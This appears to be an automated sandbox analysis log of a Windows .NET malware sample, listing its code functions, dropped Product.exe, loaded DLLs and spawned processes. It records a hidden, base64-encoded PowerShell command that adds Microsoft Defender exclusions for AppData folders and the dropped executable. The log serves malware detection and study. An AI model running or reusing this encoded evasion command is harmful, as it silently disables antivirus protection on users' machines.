                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_0587D3C54_2_0587D3C5
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_0588233B4_2_0588233B
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058887604_2_05888760
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058892E94_2_058892E9
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05887DA84_2_05887DA8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05887DA34_2_05887DA3
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058888DE4_2_058888DE
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058887514_2_05888751
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_0588CA324_2_0588CA32
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C27A04_2_059C27A0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C76684_2_059C7668
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C4D704_2_059C4D70
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C6E184_2_059C6E18
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C59884_2_059C5988
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C0B584_2_059C0B58
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059CD4184_2_059CD418
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C945E4_2_059C945E
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C27934_2_059C2793
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C76584_2_059C7658
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C50B84_2_059C50B8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C70774_2_059C7077
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C63484_2_059C6348
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C6E084_2_059C6E08
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05F563704_2_05F56370
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05F563414_2_05F56341
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05F53E804_2_05F53E80
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05F53E734_2_05F53E73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01026CF05_2_01026CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010244205_2_01024420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010216E95_2_010216E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010216F85_2_010216F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01026CE15_2_01026CE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E37E85_2_051E37E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E03C75_2_051E03C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E14705_2_051E1470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E06FF5_2_051E06FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F87605_2_051F8760
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F233B5_2_051F233B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F92E95_2_051F92E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F7D985_2_051F7D98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F7DA85_2_051F7DA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F87515_2_051F8751
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F88DE5_2_051F88DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051FCA325_2_051FCA32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0533A5215_2_0533A521
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05334D705_2_05334D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053359885_2_05335988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053327A05_2_053327A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05336E185_2_05336E18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053376685_2_05337668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05330E885_2_05330E88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053370775_2_05337077
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053350B85_2_053350B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053363485_2_05336348
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053327925_2_05332792
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05336E085_2_05336E08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_053376585_2_05337658
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F86CF012_2_00F86CF0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F8442012_2_00F84420
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F816F812_2_00F816F8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F816E912_2_00F816E9
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F83B2F12_2_00F83B2F
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81CFA12_2_00F81CFA
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F86CE112_2_00F86CE1
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81DD012_2_00F81DD0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81D9A12_2_00F81D9A
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81D7B12_2_00F81D7B
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81D5E12_2_00F81D5E
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81D3812_2_00F81D38
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_00F81D2412_2_00F81D24
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052E37E812_2_052E37E8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052E03C712_2_052E03C7
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052E147012_2_052E1470
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052E06FF12_2_052E06FF
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F233B12_2_052F233B
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F876012_2_052F8760
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F92E912_2_052F92E9
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F7DA812_2_052F7DA8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F7D9812_2_052F7D98
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F88DE12_2_052F88DE
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F875112_2_052F8751
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052FCA3212_2_052FCA32
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05434D7012_2_05434D70
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543598812_2_05435988
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_054327A012_2_054327A0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05436E1812_2_05436E18
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05430E8812_2_05430E88
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543634812_2_05436348
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543279212_2_05432792
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543707712_2_05437077
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05436E0812_2_05436E08
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_054350B812_2_054350B8
                      Source: test.exeBinary or memory string: OriginalFilename vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
                      Source: test.exe, 00000000.00000002.1505562731.0000000003355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs test.exe
                      Source: test.exe, 00000000.00000002.1505562731.0000000003355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs test.exe
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
                      Source: test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
                      Source: test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
                      Source: test.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
                      Source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
                      Source: test.exe, 00000000.00000002.1504186751.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs test.exe
                      Source: test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
                      Source: test.exe, 00000000.00000000.1475467152.0000000000C36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWoouhtlutd.exe" vs test.exe
                      Source: test.exeBinary or memory string: OriginalFilenameWoouhtlutd.exe" vs test.exe
                      Source: test.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: test.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Product.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: test.exe, DefinitionBridge.csCryptographic APIs: 'CreateDecryptor'
                      Source: test.exe, ParameterObject.csCryptographic APIs: 'CreateDecryptor'
                      Source: test.exe, ParameterObject.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.evad.winEXE@10/13@1/1
                      Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\MethodSignatureJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6784:120:WilError_03
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\lnwza888
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5956:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jufotpl.4nx.ps1Jump to behavior
                      Source: test.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: test.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\test.exeFile read: C:\Users\user\Desktop\test.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\test.exe "C:\Users\user\Desktop\test.exe"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
